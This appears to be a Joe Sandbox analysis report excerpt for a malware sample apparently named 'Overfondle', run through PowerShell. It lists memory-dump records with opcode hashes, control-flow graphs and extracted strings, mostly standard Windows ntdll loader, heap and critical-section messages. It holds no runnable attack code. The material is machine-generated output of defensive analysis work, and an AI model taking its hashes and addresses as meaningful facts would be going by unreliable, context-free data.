                                                                        • Opcode Fuzzy Hash: 2a62c8c26431f5c8e4b48a267500226ffb0665a4cc53c28fb1b562c460006e7b
                                                                        • Instruction Fuzzy Hash: 19313B35B012288FCB25DB74D8956EEB7B2AF89304F1484E9D40AAB351CB35DE85CF81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 29afc0214264d4efe84e8906ed65dcad007eb1314718f10610d03840818c20d0
                                                                        • Instruction ID: 16070192aea6400fc89b878c2386ccf50a4b2a0064178c9a931e2f07923a663d
                                                                        • Opcode Fuzzy Hash: 29afc0214264d4efe84e8906ed65dcad007eb1314718f10610d03840818c20d0
                                                                        • Instruction Fuzzy Hash: 7E319071A04605DFCB15CF59C9C49AAFBF5FF48310B288699E449AB756C732EC40CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6afacd0b611fc25eaa7068fdbdcf5a2d6a099f34e29375b37aeba617783ddb43
                                                                        • Instruction ID: 478f001f4710ce700de62cbc22448ffba4dc7cd048d50f96a1dba834fe260a28
                                                                        • Opcode Fuzzy Hash: 6afacd0b611fc25eaa7068fdbdcf5a2d6a099f34e29375b37aeba617783ddb43
                                                                        • Instruction Fuzzy Hash: 46219BB13443896FD731467948157727FA99FC2218F248567E402DB3C7E979D880C372
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bb59b925ce67b263ca52231a3ea0f4a9509788825bb6953a628f6cd42abcff69
                                                                        • Instruction ID: 16d82d5eb3f87b12f9363a545290f54253446768cae1e8c1833a839efd1b4357
                                                                        • Opcode Fuzzy Hash: bb59b925ce67b263ca52231a3ea0f4a9509788825bb6953a628f6cd42abcff69
                                                                        • Instruction Fuzzy Hash: 6501767634022A9BC72449AAD40467AF7DADFC16ABF14C03BD54ACB610DA72C842C7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6baf66c52b8be866be927d5040170979278fee31e54e932cb900471d9c2993fa
                                                                        • Instruction ID: e3fdfd4a1f083bd2e77d6ec3fc5604dc35d935e9ecc56b8021d8265595198d35
                                                                        • Opcode Fuzzy Hash: 6baf66c52b8be866be927d5040170979278fee31e54e932cb900471d9c2993fa
                                                                        • Instruction Fuzzy Hash: BF11B935A00209EFDB45CFA4D884A9DFBB2FF48314F298559E405AB365C771E882CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064265018.000000000333D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0333D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_333d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c79454009921bfe34fd6d847596c1fa1d281a0429ddb0957f3913b50eb09b076
                                                                        • Instruction ID: 798a8934bded128a2dfffde82d1f3d9a68b4ba68d9530b5b356fec93702ddcb2
                                                                        • Opcode Fuzzy Hash: c79454009921bfe34fd6d847596c1fa1d281a0429ddb0957f3913b50eb09b076
                                                                        • Instruction Fuzzy Hash: 4601807240D3C05FD7128B258C84792BFA8DF43624F0985CBE8848F1A3C26C5C45CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064265018.000000000333D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0333D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_333d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8e495027d294e8cb285a54cf717b977ed3ff9a665ce53043a056fb2d8804bc43
                                                                        • Instruction ID: 8f8c0ef7a9866f35ee0591d6526d1ea36c2327980d377edc2153e51087307b6f
                                                                        • Opcode Fuzzy Hash: 8e495027d294e8cb285a54cf717b977ed3ff9a665ce53043a056fb2d8804bc43
                                                                        • Instruction Fuzzy Hash: 4201F2324043449EF7208E21CCC4BA7FB9CEF42A24F08C15AED595E642C77C9881CAB2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064265018.000000000333D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0333D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_333d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e0fec4f6444bf810dd56a589157cda31bd7e5e439bf1ce75fbd14f45886e7d1d
                                                                        • Instruction ID: 29155c963274417e62fd8bfa8d213440fe7539c4fc50fc3e860f7133e37aafbf
                                                                        • Opcode Fuzzy Hash: e0fec4f6444bf810dd56a589157cda31bd7e5e439bf1ce75fbd14f45886e7d1d
                                                                        • Instruction Fuzzy Hash: 36214672500304EFDB05DF14D9C0B26BB69FB89325F24C5ADE9090F666C336E456CBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: l$l$l$l
                                                                        • API String ID: 0-2658161240
                                                                        • Opcode ID: beeb686be4f444a7c539e82f648da27dd73f4b3955b33bd7218f725e7440fd1d
                                                                        • Instruction ID: be8aae4895b13e7aac9a5269f27662c1e279bb7d0326ae3977cde95d10e036b8
                                                                        • Opcode Fuzzy Hash: beeb686be4f444a7c539e82f648da27dd73f4b3955b33bd7218f725e7440fd1d
                                                                        • Instruction Fuzzy Hash: 09F168B6B043068FDB259B68940976ABBF6AFC1718F24857BD406DB351DB32CC41CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage: 0%
                                                                        Dynamic/Decrypted Code Coverage: 100%
                                                                        Signature Coverage: 100%
                                                                        Total number of Nodes: 1
                                                                        Total number of Limit Nodes: 0
                                                                        execution_graph 45482 204a2c70 LdrInitializeThunk

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2 204a35c0-204a35cc LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6243c035071257fe522324d0451ee7cd4bfd3366e0e13722e6b9643618ba8d7d
                                                                        • Instruction ID: 160ddb650644586065b8bef7b165fb27d4cd3010d142e41f1c74db0f15a68496
                                                                        • Opcode Fuzzy Hash: 6243c035071257fe522324d0451ee7cd4bfd3366e0e13722e6b9643618ba8d7d
                                                                        • Instruction Fuzzy Hash: 5D900231A0550402D21071994954706100547E4201F65C417A0425568D87998A51A9B2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 204a2c70-204a2c7c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 1ab644f861b114d660c3878690ed7230ae8cdb8334cb808cf977bb42488df93c
                                                                        • Instruction ID: d9d322255965072a75656966a239f5c2bc8d09a485767f20c2c8acb6cd33f173
                                                                        • Opcode Fuzzy Hash: 1ab644f861b114d660c3878690ed7230ae8cdb8334cb808cf977bb42488df93c
                                                                        • Instruction Fuzzy Hash: 1890023160148802D2207199884474A000547E4301F59C417A4425658D86998991B531
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1 204a2df0-204a2dfc LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 7c36b88e0929aa8ec7f11315872fb5c282b3c934cb7528dd57a8c3e29b105231
                                                                        • Instruction ID: ca6333541dd845002cdfec532a9bd4870f65f8c66b6405ec46a1f37da24bd57c
                                                                        • Opcode Fuzzy Hash: 7c36b88e0929aa8ec7f11315872fb5c282b3c934cb7528dd57a8c3e29b105231
                                                                        • Instruction Fuzzy Hash: 5B90023160140413D22171994944707000947E4241F95C417A0425558D965A8A52E531
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2160512332
                                                                        • Opcode ID: 86070ab00026a2e4131a25f012cd198ed5d24a1ab381a4080fcc7484b40ecc1c
                                                                        • Instruction ID: 5e279187f594f71556794e88d0e9b1fcd23ec58e319f0f76c747196014e516b9
                                                                        • Opcode Fuzzy Hash: 86070ab00026a2e4131a25f012cd198ed5d24a1ab381a4080fcc7484b40ecc1c
                                                                        • Instruction Fuzzy Hash: B792BE71604341AFE321CFA6C981F5BB7E8BB84759F10892DFA98D7250D778E844CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 540 20498620-20498681 541 204d5297-204d529d 540->541 542 20498687-20498698 540->542 541->542 543 204d52a3-204d52b0 GetPEB 541->543 543->542 544 204d52b6-204d52b9 543->544 545 204d52bb-204d52c5 544->545 546 204d52d6-204d52fc call 204a2ce0 544->546 545->542 547 204d52cb-204d52d4 545->547 546->542 551 204d5302-204d5306 546->551 549 204d532d-204d5341 call 204654a0 547->549 556 204d5347-204d5353 549->556 551->542 553 204d530c-204d5321 call 204a2ce0 551->553 553->542 560 204d5327 553->560 558 204d555c-204d5568 call 204d556d 556->558 559 204d5359-204d536d 556->559 558->542 562 204d536f 559->562 563 204d538b-204d5401 559->563 560->549 566 204d5371-204d5378 562->566 568 204d543a-204d543d 563->568 569 204d5403-204d5435 call 2045fd50 563->569 566->563 567 204d537a-204d537c 566->567 570 204d537e-204d5381 567->570 571 204d5383-204d5385 567->571 573 204d5514-204d5517 568->573 574 204d5443-204d5494 568->574 580 204d554d-204d5552 call 204ea4b0 569->580 570->566 571->563 575 204d5555-204d5557 571->575 573->575 576 204d5519-204d5548 call 2045fd50 573->576 581 204d54ce-204d5512 call 2045fd50 * 2 574->581 582 204d5496-204d54cc call 2045fd50 574->582 575->556 576->580 580->575 581->580 582->580
                                                                        Strings
                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 204D540A, 204D5496, 204D5519
                                                                        • Critical section debug info address, xrefs: 204D541F, 204D552E
                                                                        • double initialized or corrupted critical section, xrefs: 204D5508
                                                                        • undeleted critical section in freed memory, xrefs: 204D542B
                                                                        • Address of the debug info found in the active list., xrefs: 204D54AE, 204D54FA
                                                                        • Critical section address, xrefs: 204D5425, 204D54BC, 204D5534
                                                                        • corrupted critical section, xrefs: 204D54C2
                                                                        • Critical section address., xrefs: 204D5502
                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 204D54E2
                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 204D5543
                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 204D54CE
                                                                        • Invalid debug info address of this critical section, xrefs: 204D54B6
                                                                        • 8, xrefs: 204D52E3
                                                                        • Thread identifier, xrefs: 204D553A
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                        • API String ID: 0-2368682639
                                                                        • Opcode ID: e1f11b61f5f66eab45fa7a2e60c80e872d3f92e4f70611a3f731d286a16627de
                                                                        • Instruction ID: 5c20a539716ff62d026340d1fe72503171996f52a2df7457f8cf43e6e4335e59
                                                                        • Opcode Fuzzy Hash: e1f11b61f5f66eab45fa7a2e60c80e872d3f92e4f70611a3f731d286a16627de
                                                                        • Instruction Fuzzy Hash: 07815AB1D00298AFEB10CFD8C894F9EBBB5BB18718F208159F905B7B40D779A945CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 697 20510274-20510296 call 204b7e54 700 205102b5-205102cd call 204576b2 697->700 701 20510298-205102b0 RtlDebugPrintTimes 697->701 706 205102d3-205102e9 700->706 707 205106f7 700->707 705 20510751-20510760 701->705 709 205102f0-205102f2 706->709 710 205102eb-205102ee 706->710 708 205106fa-2051074e call 20510766 707->708 708->705 712 205102f3-2051030a 709->712 710->712 714 205106b1-205106ba GetPEB 712->714 715 20510310-20510313 712->715 717 205106d9-205106de call 2045b970 714->717 718 205106bc-205106d7 GetPEB call 2045b970 714->718 715->714 719 20510319-20510322 715->719 727 205106e3-205106f4 call 2045b970 717->727 718->727 720 20510324-2051033b call 2046ffb0 719->720 721 2051033e-20510351 call 20510cb5 719->721 731 20510353-2051035a 721->731 732 2051035c-20510370 call 2045758f 721->732 727->707 731->732 736 205105a2-205105a7 732->736 737 20510376-20510382 GetPEB 732->737 736->708 740 205105ad-205105b9 GetPEB 736->740 738 205103f0-205103fb 737->738 739 20510384-20510387 737->739 741 20510401-20510408 738->741 742 205104e8-205104fa call 204727f0 738->742 743 205103a6-205103ab call 2045b970 739->743 744 20510389-205103a4 GetPEB call 2045b970 739->744 745 20510627-20510632 740->745 746 205105bb-205105be 740->746 741->742 749 2051040e-20510417 741->749 765 20510590-2051059d call 205111a4 call 20510cb5 742->765 766 20510500-20510507 742->766 755 205103b0-205103d1 call 2045b970 GetPEB 743->755 744->755 745->708 750 20510638-20510643 745->750 752 205105c0-205105db GetPEB call 2045b970 746->752 753 205105dd-205105e2 call 2045b970 746->753 758 20510419-20510429 749->758 759 20510438-2051043c 749->759 750->708 760 20510649-20510654 750->760 764 205105e7-205105fb call 2045b970 752->764 753->764 755->742 784 205103d7-205103eb 755->784 758->759 767 2051042b-20510435 call 2051dac6 758->767 769 2051044e-20510454 759->769 770 2051043e-2051044c call 20493bc9 759->770 760->708 768 2051065a-20510663 GetPEB 760->768 795 205105fe-20510608 GetPEB 764->795 765->736 774 20510512-2051051a 766->774 775 20510509-20510510 766->775 767->759 778 20510682-20510687 call 2045b970 768->778 779 20510665-20510680 GetPEB call 2045b970 768->779 771 20510457-20510460 769->771 770->771 782 20510472-20510475 771->782 783 20510462-20510470 771->783 786 20510538-2051053c 774->786 787 2051051c-2051052c 774->787 775->774 792 2051068c-205106ac call 205086ba call 2045b970 778->792 779->792 793 205104e5 782->793 794 20510477-2051047e 782->794 783->782 784->742 798 2051056c-20510572 786->798 799 2051053e-20510551 call 20493bc9 786->799 787->786 796 2051052e-20510533 call 2051dac6 787->796 792->795 793->742 794->793 802 20510480-2051048b 794->802 795->708 804 2051060e-20510622 795->804 796->786 803 20510575-2051057c 798->803 811 20510563 799->811 812 20510553-20510561 call 2048fe99 799->812 802->793 808 2051048d-20510496 GetPEB 802->808 803->765 809 2051057e-2051058e 803->809 804->708 814 205104b5-205104ba call 2045b970 808->814 815 20510498-205104b3 GetPEB call 2045b970 808->815 809->765 817 20510566-2051056a 811->817 812->817 823 205104bf-205104dd call 205086ba call 2045b970 814->823 815->823 817->803 823->793
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                        • API String ID: 3446177414-1700792311
                                                                        • Opcode ID: 728afd873c4118da679210a5b9c966b4f1953e8c63cee183a26c7db945822c46
                                                                        • Instruction ID: 174bdc58f8680f138c3ed64176c7236a223cb438dbb46ec7df27b67aa2176c25
                                                                        • Opcode Fuzzy Hash: 728afd873c4118da679210a5b9c966b4f1953e8c63cee183a26c7db945822c46
                                                                        • Instruction Fuzzy Hash: 2BD1CA71500684DFEB02CFE8C481AADFFF2FF6A608F149459E545AB252C7B89985CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        Strings
                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 204D261F
                                                                        • @, xrefs: 204D259B
                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 204D22E4
                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 204D2602
                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 204D2624
                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 204D2412
                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 204D2409
                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 204D2498
                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 204D25EB
                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 204D24C0
                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 204D2506
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                        • API String ID: 0-4009184096
                                                                        • Opcode ID: 9e27c03d4561828750c24612ce41ec863e50c4ecea7a4c84738a37d89d078ab0
                                                                        • Instruction ID: e353e99c0469d5b065e01f312acaeab593d19b0c4ef0ff73be6b72d0566d8d78
                                                                        • Opcode Fuzzy Hash: 9e27c03d4561828750c24612ce41ec863e50c4ecea7a4c84738a37d89d078ab0
                                                                        • Instruction Fuzzy Hash: 6E0242B2D002289BDB21CF94CD90BDDB7B8AF55714F4081EAEA08A7241D7399F85CF59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimeuserer.exe$services.exe$smss.exe$svchost.exe
                                                                        • API String ID: 0-2515994595
                                                                        • Opcode ID: 47171151af9620a26b69c4bfbd99749c5654afc58a49f4360097a365706ed4ca
                                                                        • Instruction ID: 8dae927b99a32bc27f1a7033ab025f4e6c202df35d4129effdd0f7279b5bc36b
                                                                        • Opcode Fuzzy Hash: 47171151af9620a26b69c4bfbd99749c5654afc58a49f4360097a365706ed4ca
                                                                        • Instruction Fuzzy Hash: 3D51C0711043059BD724CB948884FAFBBE9FF98754F248A1EF9D486680E778DA04C7A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T$`VC ${
                                                                        • API String ID: 0-2535458381
                                                                        • Opcode ID: 20aae4777a3c8b806860f57d6afe0dc03a08f5d8fd5bd1537256a97a266edd02
                                                                        • Instruction ID: b1a23b7bbe5f806dec87a050a5c835e68b1d4ec135df165ca14734540f16935b
                                                                        • Opcode Fuzzy Hash: 20aae4777a3c8b806860f57d6afe0dc03a08f5d8fd5bd1537256a97a266edd02
                                                                        • Instruction Fuzzy Hash: FEA26D74A05629CFDB64CF95CD98B99B7B1AF85304F6082E9D94CA7350EB389E81CF01
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Strings
                                                                        • VerifierFlags, xrefs: 204E8C50
                                                                        • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 204E8A67
                                                                        • VerifierDlls, xrefs: 204E8CBD
                                                                        • AVRF: -*- final list of providers -*- , xrefs: 204E8B8F
                                                                        • VerifierDebug, xrefs: 204E8CA5
                                                                        • HandleTraces, xrefs: 204E8C8F
                                                                        • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 204E8A3D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmp
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
